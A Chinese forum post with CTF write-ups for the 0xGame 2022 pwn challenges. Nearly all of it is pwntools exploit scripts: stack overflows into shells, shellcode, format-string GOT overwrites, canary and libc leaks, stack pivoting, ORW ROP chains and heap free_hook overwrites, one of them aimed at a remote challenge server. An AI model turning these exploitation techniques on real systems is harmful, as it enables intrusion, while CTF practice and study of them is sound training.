0xgame2022 PWN week1-4

数据人与超自然意识  金牌会员 | 2022-11-1 20:49:18 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 829|帖子 829|积分 2487

0xgame week1

pwn1

签到的nc,cat flag
pwn2

ret2backdoor,一个栈溢出
  1. #encoding = utf-8
  2. from pwn import *
  3. import os
  4. import sys
  5. import time
  6. #from ae64 import AE64
  7. #from LibcSearcher import *
  9. context.os = 'linux'
  10. context.arch = 'amd64'
  11. #context.arch = 'i386'
  12. context.log_level = "debug"
  15. name = './pwn2'
  17. debug = 1
  18. if debug:
  19.     p = remote('49.233.15.226',8002)
  20. else:
  21.     p = process(name)
  24. libcso = '/lib/x86_64-linux-gnu/libc.so.6'
  25. #libcso = './'
  26. libc = ELF(libcso)
  27. #libc = elf.libc
  28. elf = ELF(name)
  30. context.terminal = ['gnome-terminal','-x','sh','-c']
  32. s       = lambda data               :p.send(str(data))
  33. sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
  34. sl      = lambda data               :p.sendline(str(data))
  35. sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
  36. r       = lambda num                :p.recv(num)
  37. ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
  38. itr     = lambda                    :p.interactive()
  39. uu32    = lambda data               :u32(data.ljust(4,'\x00'))
  40. uu64    = lambda data               :u64(data.ljust(8,'\x00'))
  41. li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
  42. ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
  44. add_idx = 1
  45. delete_idx = 2
  46. show_idx = 4
  47. edit_idx = 3
  49. def dbg():
  50.    gdb.attach(proc.pidof(p)[0])
  51.    pause()
  52.   
  53. '''
  54. def choice(cho):
  55.     sla('enter your command: \n',cho)
  57. def add(idx):
  58.     choice(add_idx)
  59.     sla('choise:',idx)
  61. def delete(idx):
  62.     choice(delete_idx)
  63.     sla('Index: \n',idx)
  65. def show(idx):
  66.     choice(show_idx)
  67.     sla('Index: ',idx)
  69. def edit(idx,content):
  70.     choice(edit_idx)
  71.     sla('Index: ',idx)
  72.     p.sendlineafter('Message: \n',content)
  73. '''
  75. sys = 0x40123d
  76. main = 0x4011FB
  77. pl = b'a'*0x58+p64(sys)
  79. p.recvuntil('ret2text?\n')
  80. p.sendline(pl)
  81. #dbg()
  83. p.interactive()
  85. '''
  86. def pwn():
  88. if __name__ == '__main__':
  89.     pwn()
  90. '''
  92. #print('========================================================================================')
  94. '''
  95. pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
  97. pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
  99. pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
  101. pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
  103. leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
  105. bin_sh = libc + libc.search('/bin/sh').next()
  107. open_addr = libc_base + libc.sym['open']
  108. read_addr = libc_base + libc.sym['read']
  109. puts_addr = libc_base + libc.sym['puts']
  111. gadget = libc_base + libc.sym['svcudp_reply'] + 0x1a
  112. li('gadget = '+hex(gadget))
  114. '''
  115. '''
  116. mov    rbp,QWORD PTR [rdi+0x48]
  117. mov    rax,QWORD PTR [rbp+0x18]
  118. lea    r13,[rbp+0x10]
  119. mov    DWORD PTR [rbp+0x10],0x0
  120. mov    rdi,r13
  121. call   QWORD PTR [rax+0x28]
  122. '''
  123. #print('========================================================================================')
  126. '''
  127. def ret2libc_leak(main,got,plt,offset):
  128.     if x64_32:
  129.         payload = b'a'*offset + b'b'*8 + p64(rdi) + p64(got) + p64(plt) + p64(main)
  130.     else:
  131.         payload = b'a'*offset + b'b'*4 + p32(plt) + p32(main) + p32(got)
  132.     return payload
  134. def fmt_w(flag,num,offset):
  135.     if flag==2:
  136.         payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hn'
  137.     elif flag==1:
  138.         payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hhn'
  139. '''
  140. #print('========================================================================================')
  142. '''
  143. 0xe3afe execve("/bin/sh", r15, r12)
  144. constraints:
  145.   [r15] == NULL || r15 == NULL
  146.   [r12] == NULL || r12 == NULL
  148. 0xe3b01 execve("/bin/sh", r15, rdx)
  149. constraints:
  150.   [r15] == NULL || r15 == NULL
  151.   [rdx] == NULL || rdx == NULL
  153. 0xe3b04 execve("/bin/sh", rsi, rdx)
  154. constraints:
  155.   [rsi] == NULL || rsi == NULL
  156.   [rdx] == NULL || rdx == NULL
  157. '''
  158. #print('========================================================================================')
  160. '''
  161. def dbg(cmd=''):
  162.     os.system('tmux set mouse on')
  163.     context.terminal = ['gnome-terminal','-x','sh','-c']
  164.     gdb.attach(p,cmd)
  165.     pause()
  167. command = 'b *'+ str(hex(gadget))+'\n'
  168. dbg(command)
  169. '''
  170. #print('========================================================================================')
复制代码
pwn3

经典的ret2text
  1. sys = 0x0401080
  2. sys_ls = 0x040124D
  3. bin_sh = 0x0404048
  5. pop_rdi_ret = 0x4012c3
  6. ret = 0x40101a
  8. pl = b'a'*0xa8 + p64(ret)+ p64(pop_rdi_ret) + p64(bin_sh) + p64(sys)
  9. p.sendafter('me?\n',pl)
复制代码
pwn4

ret2shellcode,将shellcode填入buf处再填满溢出回buf处即可
  1. shellcode=asm(shellcraft.sh())
  2. print(shellcode)
  4. p.recvuntil(':')
  5. buf_addr  = int(p.recv(15),16)
  6. li('buf_addr  = '+hex(buf_addr))
  7. shellcode_addr = buf_addr + 0x58 + 8
  8. li('shellcode_addr  = '+hex(shellcode_addr))
  10. p.recvuntil('something?')
  11. shell=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
  13. pl = shell.ljust(88,b'\x00')+p64(buf_addr)
  14. #pl = b'a'*0x58 + p64(shellcode_addr) + shellcode
  15. p.sendline(pl)
  17. #dbg()
复制代码
pwn5

ret2libc,给了puts地址所以可以直接获取libc基地址
  1. puts_got = elf.got['puts']
  2. puts_plt = elf.plt['puts']
  3. ret = 0x40101a
  4. pop_rdi_ret = 0x4012f3
  5. main = 0x040121B
  6. p.sendlineafter('words?\n','-255')
  8. pl = b'a'*0x58+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
  10. p.sendline(pl)
  12. libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
  13. li('libc_base = '+hex(libc_base))
  15. #dbg()
  16. sys = libc_base + libc.sym['system']
  17. bin_sh = libc_base + 0x1b45bd
  19. p.sendlineafter('words?\n','-255')
  21. pl = b'a'*0x58+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys)
  23. p.sendline(pl)
复制代码
pwn6

一个ret2csu

gadgets1 = 0x000000000040130a
gadgets2 = 0x00000000004012f0

execve:


  1. gadget1_addr = 0x40130A
  2. gadget2_addr = 0x4012F0
  3. bin_sh_addr = 0x40201D
  5. def com_gadget(addr1 , addr2 , jmp2 , arg1 , arg2 , arg3):
  6.     payload = p64(addr1) + p64(0) + p64(1) + p64(arg1) + p64(arg2) + p64(arg3) + p64(jmp2) + p64(addr2) + b'a'*56
  7.         return payload
  9. payload = b'a'*0x50 + b'b'*0x8 +
  10. payload += com_gadget(gadget1_addr, gadget2_addr, elf.got['execve'], bin_sh_addr, 0, 0)
  12. p.sendafter(b'Plz tell me sth : ', payload)
  13. p.sendline(b'cat flag 1>&0')
复制代码
gift


一个利用点是system("$0") 等价于 system("/bin/sh")
libc文件放进IDA中可以看到puts调用了j_strlen这个函数(其实在libc 中也只有 j_xxx 的函数才会有 plt 表与 got 表),所以直接将 libc 中 j_strlen() 函数的 got 表改为 system 函数即可

到改其调用的其他某个函数在 libc 中的 got 表为 system ,并保证此时 rdi 依然是 $0 即可(也就是在 libc 的 puts 中找到它最先调用的那个函数最保险)

将libc_strlen_got写入buf中去
  1. p.sendlineafter("address:\n", hex(libc_strlen_got))
复制代码
  1. p.sendafter("content:\n", p64(system_addr)[:5])
  2. #只能读进5位,但前面都是相同的,所以将sys的后5位送进去就可以修改got表里的__strlen_avx2
复制代码
  1. p.recvuntil("gift:\n")
  3. libc_base = int(p.recvline().strip(b"\n"), 16) - libc.sym['puts']
  5. li("libc_base:\t" + hex(libc_base))
  7. libc_strlen_got = libc_base + 0x1EC0A8
  8. li('libc_strlen_got ='+hex(libc_strlen_got))
  9. system_addr = libc_base + libc.sym['system']
  12. #p.sendlineafter("address:\n", b'bbbb')
  14. p.sendlineafter("address:\n", hex(libc_strlen_got))  
  17. print(b'1 = '+ p64(system_addr))
  18. print(b'2 = '+ (p64(system_addr)[:5]))
  19. dbg()
  21. '''
  22. p.sendafter("content:\n", b'aaaaa')
  23. '''
  24. p.sendafter("content:\n", p64(system_addr)[:5])
复制代码
week2

pwn1

格式字符串漏洞,利用达成a = 66就可以getshell
  1. a_addr = 0x404050
  2. payload = fmtstr_payload(6, {a_addr:66})
  3. p.recvuntil('format?\n')
  4. p.sendline(payload)
  5. p.interactive()
复制代码
pwn2

卡了一会,最后做出来的这个
这个有后门,给了两个格式字符串漏洞,还给了glibc,着实被迷惑住了,方向想歪了
其实只要第二次输入的时候将puts的got表改成backdoor,当read完后,执行到下面puts就相当于触发后门了
  1. backdoor = 0x40121B
  2. p.recvuntil('something?\n')
  3. pl = '%1$p-%3$p'
  4. p.sendline(pl)
  5. '''
  6. stack = int(p.recv(14),16)
  7. li(hex(stack))
  8. '''
  9. p.recvuntil('-')
  10. libc = int(p.recv(14),16)-0x10DFD2
  11. li(hex(libc))
  13. p.recvuntil('deeper')
  14. '''
  15. pl = b'a'*0x68+p64(backdoor)
  16. p.sendline(pl)
  17. #dbg()
  18. '''
  19. pro = ELF("./pwn2")
  20. puts_got = pro.got["puts"]
  21. system_plt = pro.plt["system"]
  22. pl = fmtstr_payload(8, {puts_got:backdoor})
  23. p.send(pl)
  25. p.interactive()
复制代码
pwn3

开了pie,通过第一次输入的格式字符串漏洞泄露出改一下就能拿到backdoor地址了
但要注意的点是这个后门需要加上偏移,不然跳到的不是正确的位置
  1. bd = 0x122E
  2. p.recvuntil('name?\n')
  3. pl = '%27$p'
  4. p.sendline(pl)
  5. #1
  6. magic = int(p.recv(12)+b'2E',16)
  7. li('magic = '+hex(magic))
  8. #2
  9. #dbg()
  10. p.recvuntil('getshell?\n')
  11. pl = b'a'*0x88+p64(magic+6)
  12. p.sendline(pl)
  14. p.interactive()
复制代码
pwn4

无后门,泄露并获取canary和libc基址
第二次栈溢出即可
  1. bd = 0x122E
  2. p.recvuntil('name?\n')
  3. pl = '%3$p-%23$p'
  4. p.sendline(pl)
  6. libc = int(p.recv(14),16)
  7. libc_base = libc-0x10DFD2
  8. li('libc_base = '+hex(libc_base))
  9. p.recvuntil('-')
  10. canary = int(p.recv(18),16)
  11. li(hex(canary))
  13. sys = libc_base + 0x52290
  14. bin_sh = libc_base + 0x1b45bd
  16. ret = 0x000000000040101a
  17. pop_rdi_ret = 0x0000000000401323
  20. #dbg()
  21. p.recvuntil('getshell?\n')
  22. pl = b'a'*0x88+p64(canary)+b'b'*0x8
  23. pl += p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(sys)
  24. p.sendline(pl)
  26. p.interactive()
复制代码
pwn5



区别于上个题,最后有个奇怪的东西
  1. pl = b'%39$p%40$p%43$p'
  2. p.recvuntil('name?\n')
  3. p.sendline(pl)
  5. canary = int(p.recv(10),16)
  6. li(hex(canary))
  7. stack = int(p.recv(10),16)
  8. li(hex(stack))
  9. libc_base = int(p.recv(10),16) - (0xf7ce84a0-0xf7cc7000) -121
  10. #-libc.sym['__libc_start_call_main']-121
  11. li('libc_base = '+hex(libc_base))
  13. system_addr = libc_base + libc.sym['system']
  14. binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
复制代码
  1. payload = b'a'*0x80 + p32(canary) + p32(stack - 0x10) + b'b'*4 + b's'*4
复制代码
stack-0x10:
  1. payload = b'a'*0x80 + p32(canary) + p32(stack - 0x10) + b'b'*4 + b's'*4 # b'a'*12
  2. payload += p32(system_addr) + b'c'*4 + p32(binsh_addr)
  4. dbg()
  5. p.sendlineafter("Do you know how to getshell?\n", payload)
复制代码
week3

pwn1

禁execve,有次较大的read




利用思路:
首先获取libc,再返回main地址
然后构造一个read写到bss+0x500,再返回main地址
接着通过这次读将构造好的orw写入上面的bss+0x500
接下来栈迁移bss+0x4f8到栈上执行(注意栈帧的调整)
获取libc
  1. puts_got = elf.got['puts']
  2. puts_plt = elf.plt['puts']
  3. read_got = elf.got['read']
  4. main_addr = 0x4012ff
  5. getflag = 0x404048
  7. pop_rdi_ret = 0x4013b3
  8. ret = 0x40101a
  9. bss = elf.bss()
  10. li('bss = '+hex(bss))
  12. p.recvuntil('try\n')
  13. pl = b'a'*0x28 +p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
  14. p.sendline(pl)
  16. libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
  17. li('libc_base'+hex(libc_base))
  19. open_addr = libc_base + libc.sym['open']
  20. read_addr = libc_base + libc.sym['read']
  21. puts_addr = libc_base + libc.sym['puts']
  23. pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
  25. pop_rax_ret = libc_base + libc.search(asm('pop rax;ret;')).__next__()
  27. pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
  29. pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
  31. pop_rsi15_ret = libc_base + libc.search(asm('pop rsi;pop r15;ret;')).__next__()
  33. leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
  35. syscall = libc_base + libc.sym['syscall']
复制代码
构造一个read(0,bss+0x500,100)写到bss+0x500,再返回main地址
  1. p.recvuntil('try\n')
  3. poc=b'a'*0x28
  4. poc += p64(pop_rdi_ret)
  5. poc += p64(0)
  6. poc += p64(pop_rsi_ret)
  7. poc += p64(bss+0x500)
  8. poc += p64(pop_rdx12_ret)
  9. poc += p64(0x100)+p64(0)
  10. poc += p64(read_addr)
  11. poc += p64(main_addr)
  13. p.send(poc)
复制代码
通过这次读将构造的orw写入上面的bss+0x500
  1. # open(0x404048'./flag',0)
  2. pl= p64(pop_rdi_ret)+p64(0x404048)+p64(pop_rsi_ret)+p64(0)+p64(open_addr)
  3. # read(4,bss+0x500,0x50,0)
  4. pl+= p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss+0x700)+p64(pop_rdx12_ret)+p64(0x50)+p64(0)+p64(read_addr)
  5. # puts(bss+0x500)
  6. pl+= p64(pop_rdi_ret)+p64(bss+0x700)+p64(puts_addr)
  8. p.sendline(pl)
复制代码
栈迁移
  1. payload = b'a'*0x20
  2. payload += p64(bss+0x4f8)
  3. payload += p64(leave_ret)
  4. #dbg()
  5. p.sendline(payload)
  7. ''''''
  8. 图一
  9. payload = b'a'*0x28
  10. payload += p64(bss+0x4f8)
  11. payload += p64(leave_ret)
  13. 图三
  14. payload = b'a'*0x20
  15. payload += p64(bss+0x500)
  16. payload += p64(leave_ret)
  17. ''''''
复制代码


pwn2

和pwn1的区别在read读的少0x50

但我们上个exp中每次payload就写的不算多,也就可以直接套第一个用
pwn3

两次read,第一次读到mmap分配的地址
第二次读很小,只要0x10能溢出

图床不够放了,明天有空再放下面的吧
<img alt="image-20221019091212309" loading="lazy">
栈迁移
  1. pl = p64(main_addr)+p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)+ p64(main_addr) + p64(0x405000)+b'/bin/sh\x00'
  2.   
  3. # + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(0x405000+0x50) +p64(0) + p64(0x405000elf.sym['read'])
  4.   
  5. p.sendlineafter('name\n',pl)
  6. pl = b'a'*0x60+ p64(0x405000) + p64(leave_ret)
  8. p.sendafter('pivoting?\n',pl)
  10. libc_base = uu64(r(6))-libc.sym['puts']
  12. pop_rdx_ret = libc_base + 0x0000000000142c92
  13. system = libc_base + libc.sym['system']
  14. binsh = 0x30 + 0x405000
复制代码

<img alt="image-20221019091219125" loading="lazy">
<img alt="image-20221019092104370" loading="lazy">
p64(pop_rsi_ret) + p64(0) + p64(0) + p64(pop_rdx_ret) + p64(0)将rsi和rdx置零达成调用onegadgte的前提
调整栈帧跳到p64(0x404fe8),避免写入0x405000的onegadget被0覆盖
  1. pl = b'' #p64(pop_rdi_ret) + p64(binsh) + p64(system)
  3. p.sendlineafter('name\n',pl)
  4. og = libc_base + 0xe3b04
  6. pl = b'a'*0x30 + p64(pop_rsi_ret) + p64(0) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(og)+ p64(0x404fe8) +p64(leave_ret)
  8. p.sendafter('pivoting?\n',pl)
复制代码
<img alt="image-20221019094409793" loading="lazy">
<img alt="image-20221019094454177" loading="lazy">
<img alt="image-20221019095618845" loading="lazy">
<img alt="" loading="lazy">
pwn4

<img alt="image-20221020210427045" loading="lazy">
<img alt="image-20221020210757226" loading="lazy">
想较于前一题减去了第一次读入mmap分配地址的read
我们选择将shellcode写入bss段0x0404040,再栈迁移执行
<img alt="image-20221020212016071" loading="lazy">
第一次构造read(bss+0x150)
获取puts真实地址再转到read为后面进行下一次溢出
填满0x50后,进行栈迁移来执行来获取libc_base
获取libc基址后将onegadget送入,填满并对齐后进行栈迁移来执行
但要注意栈帧的调整
  1. def pwn():
  2.     pl = b'a'*0x50 + p64(0x0404040 + 0x150) + p64(0x004011FD) #bss+0x150  read
  3.     #debug()
  4.     p.sendafter('do you know stack pivoting?\n',pl)
  5.     puts_got = elf.got['puts']
  6.     puts_plt = elf.plt['puts']
  7.     pl = p64(0x0404040 + 0x100) + p64(0x0401283) + p64(puts_got) + p64(puts_plt) +p64(0x004011FD) #rdi read
  8.     pl = pl.ljust(0x50,b'\x00')
  9.     pl += p64(0x0404040 + 0x100) +p64(0x040121d) #leave_ret
  10.     p.send(pl)
  11.    
  12.     libcbase = uu64(r(6)) - libc.sym['puts']
  13.     leak('libcbase',libcbase)
  14.     pl = p64(0x000000000002601f + libcbase) + p64(0) + p64(libcbase + 0x0000000000142c92) + p64(0) + p64(libcbase + 0xe3b04) #rsi rdx og
  15.     pl = pl.ljust(0x50,b'a')
  16.     pl += p64(0x0404040 + 0xa8) + p64(0x040121d) #调栈帧 leave_ret
  17.     p.send(pl)
  19.     itr()
  21. if __name__ == '__main__':
  22.     pwn()
复制代码
whitegive_1

保护全开
<img alt="image-20221021150220900" loading="lazy">
flag被读到stream和unk_4080
<img alt="image-20221021150312356" loading="lazy">
送了libc基址,有4次任意读
  1. p.recvuntil('gift :')
  2. libcbase = int(p.recv(15),16) - libc.sym['puts']
  3. li('libc_base = '+hex(libcbase))
  4. en = libcbase + libc.sym['__environ']
  5. pl = p64(en)
  6. p.sendafter('Please input the address you want to query : ',pl)
  7. stack  = uu64(r(6))
  8. leak('stack',stack)
  9. dbg()
  10. pl = p64(stack-0x30)
  11. p.sendafter('Please input the address you want to query : ',pl)
  12. pie = uu64(r(6)) - 0x118e
  13. leak('pie',pie)
  14. flag = pie + 0x4080
  15. pl = p64(flag)
  16. p.sendafter('Please input the address you want to query : ',pl)
  17. pl = p64(stack - 0x168)
  18. p.sendafter('Please input the address you want to query : ',pl)
  19. itr()
复制代码
第一次获取stack地址
  1. en = libcbase + libc.sym['__environ']
  2. pl = p64(en)
  3. p.sendafter('Please input the address you want to query : ',pl)
  4. stack  = uu64(r(6))
  5. leak('stack',stack)
复制代码
0x7fff4419f708-0x30处找到一处程序地址
<img alt="image-20221021150930488" loading="lazy">
  1. pl = p64(stack-0x30)
  2. p.sendafter('Please input the address you want to query : ',pl)
  3. pie = uu64(r(6)) - 0x118e
  4. leak('pie',pie)
复制代码
破解了pie,然后读取bss段的后半段flag
  1. flag = pie + 0x4080
  2. pl = p64(flag)
  3. p.sendafter('Please input the address you want to query : ',pl)
复制代码
再读取前半段flag
<img alt="image-20221021151409874" loading="lazy">
<img alt="image-20221021151342352" loading="lazy">
  1. pl = p64(stack - 0x168)
  2. p.sendafter('Please input the address you want to query : ',pl)
复制代码
whitegive_1_plus

4次改为两次读
在只有libc基址的情况下获取进程地址
我们找到了stderr处
<img alt="image-20221021153010059" loading="lazy">
  1. stderr = libc_base +  0x1EBDB0
  2. li(hex(stderr))
  3. p.sendafter('query :',p64(stderr))
复制代码
打两次分别获取前后两端flag
  1. flag = uu64(r(6))-0x4040+0x4080
  2. li(hex(flag))
  3. p.sendafter('query :',p64(flag))
  5. '''
  6. p.sendafter('query :',p64(environ))
  7. p.recv()
  8. stack = uu64(r(6))
  9. li('stack = '+hex(stack))
  11. dbg()
  12. pl = p64(stack - 0x168)
  13. p.sendafter('query :',pl)
  14. '''
复制代码
whitegive_2

<img alt="image-20221021154528018" loading="lazy">
<img alt="image-20221021154615148" loading="lazy">
一次格式字符串任意读
一次0x10大小溢出
分别读了libc和stack
onegadget + 栈迁移
  1. def pwn():
  2.         pl = '%8$p%1$p'
  3.        
  4.         p.sendafter('Please leave your name :\n',pl)
  5.         ru('Hello, ')
  6.         libcbase = int(r(14),16) - 0x7fa72ecdf2e8 + 0x7fa72eaee000
  7.         leak('libcbase',libcbase)
  8.         stack = int(r(14),16)
  9.         leak('stack',stack)
  10.        
  11.         leave = libcbase + 0x00000000000578c8
  12.         og = libcbase + 0xe3b04
  13.         li(hex(og))
  14.         rsi = libcbase + 0x000000000002601f
  15.         li(hex(rsi))
  16.         rdx = libcbase + 0x0000000000142c92
  17.        
  18.         pl = p64(rdx) + p64(0) + p64(rsi) + p64(0) + p64(og)
  19.         pl = pl.ljust(0x30,b'\x00')
  20.        
  21.         pl += p64(stack+1) + p64(leave)
  22.        
  23.         p.sendafter('Now, please send your message :\n',pl)
  24.        
  25.         itr()
  27. if __name__ == '__main__':
  28.     pwn()
复制代码
<img alt="image-20221021160617126" loading="lazy">
<img alt="image-20221021160627771" loading="lazy">
<img alt="image-20221021161132608" loading="lazy">
  1. payload = b'A' * 24 + p64(addr_pop4) + p64(addr_pop_rdi) + p64(elf.got['write']) + p64(elf.symbols['puts']) + p64(elf.symbols['main'])
复制代码
whitegive_3

ret2dl-resolve
  1. payload = p64(0x4012AA)+p64(0)+p64(1)+p64(0)+p64(0x404020)+p64(0x1)+p64(0x404028)+p64(0x40 1290)
  3. payload += p64(0)+p64(0)+p64(1)+p64(0)+p64(0x404100)+p64(0x900)+p64(0x404028)+p64(0x401290)
  5. payload += p64(0)+p64(0)+p64(1)+p64(0x404100)+p64(0)+p64(0)+p64(0x404020)+p64(0x401290)
  7. p.send(b"a"*32+p64(0)+payload) sleep(1)
  9. p.send(b'\x15')
  11. sleep(1)
  13. p.send(b'/bin/sh\x00'+b'a'*0x33)
  15. p.sendline("exec 1>&0")
复制代码
week4

pwn1

UAF
<img alt="image-20221023131908790" loading="lazy">
<img alt="image-20221023131700423" loading="lazy">
  1. edit(6,0x80,p64(free_hook))
复制代码
<img alt="image-20221023131734462" loading="lazy">
  1. def choice(cho):
  2.     sla('>> ',str(cho))
  4. def add(index,size,content):
  5.     choice(add_idx)
  6.     sla('\n',str(index))
  7.     sla('\n',str(size))
  8.     sa('\n',content)
  10. def delete(index):
  11.     choice(delete_idx)
  12.     sla('\n',str(index))
  14. def show(index):
  15.     choice(show_idx)
  16.     sla('\n',str(index))
  18. def edit(index,size,content):
  19.     choice(edit_idx)
  20.     sla('\n',str(index))
  21.     sla('\n',str(size))
  22.     sla('\n',content)
  24. for i in range(8):
  25.         add(i,0x80,'\n')
  27. for i in range(7):
  28.         delete(i)
  30. add(8, 0x10, '\n')
  31. delete(7)
  32. add(8, 0x40, '\n')
  35. show(8)
  36. libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-138-0x10-libc.sym['__malloc_hook']
  37. li(hex(libc_base))
  40. system = libc_base + libc.sym['system']
  41. bin_sh = libc_base + 0x7fbc1675d5bd - 0x7fbc165a9000
  42. free_hook = libc_base + libc.sym['__free_hook']
  43. li(hex(free_hook))
  44. pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
  45. pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
  46. pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
  49. edit(6,0x80,p64(free_hook))
  52. def add2(index,size,content):
  53.     choice(add_idx)
  54.     sla('\n',str(index))
  55.     sla('\n',str(size))
  56.     sla('\n',content)
  57.    
  58. add2(0,0x80,b'0')
  59. add2(0,0x80,p64(system))
  60. add2(0,0x10,b'/bin/sh\x00')
  62. delete(0)
复制代码
pwn2

相较前一题没了edit
<img alt="image-20221101142559112" loading="lazy">
一开始卡住了,将b去掉即可
<img alt="image-20221101163312242" loading="lazy">
  1. add(20,0x10,b'/bin/sh\x00') --》 add(20,0x10,'/bin/sh\x00')
复制代码
exp:
  1. add(0,0x1000,'aaa')
  2. add(20,0x10,'/bin/sh\x00')
  3. delete(0)
  4. show(0)
  6. libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) -96 -0x10 -libc.sym['__malloc_hook'] #-0x2a
  7. li('libc_base = '+hex(libc_base))
  9. pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
  10. pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
  11. pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
  12. pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
  13. leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
  14. bin_sh = libc_base + next(libc.search(b'/bin/sh'))
  15. open_addr = libc_base + libc.sym['open']
  16. read_addr = libc_base + libc.sym['read']
  17. puts_addr = libc_base + libc.sym['puts']
  18. syscall = libc_base + libc.sym['syscall']
  19. system = libc_base + libc.sym['system']
  20. free_hook = libc_base + libc.sym['__free_hook']
  21. malloc_hook = libc_base + libc.sym['__malloc_hook']
  23. for i in range(9):
  24.         add(i,0x10,'\n')
  26. for i in range(9):
  27.         delete(i)
  29. delete(7)
  31. for i in range(7):
  32.         add(i+2,0x10,'\n')
  35. def add2(index,size,content):
  36.     choice(add_idx)
  37.     sla('\n',str(index))
  38.     sla('\n',str(size))
  39.     p.sendafter('\n',content)
  40.    
  41. add2(11,0x10,p64(free_hook))
  42. add2(12,0x10,'\n')
  43. add2(13,0x10,'\n')
  44. add2(14,0x10,p64(system))
  46. p.recvuntil(b'>> ')
  47. p.sendline("2")
  50. p.recvuntil(b'Please input index\n')
  51. p.sendline("20")
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

数据人与超自然意识

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表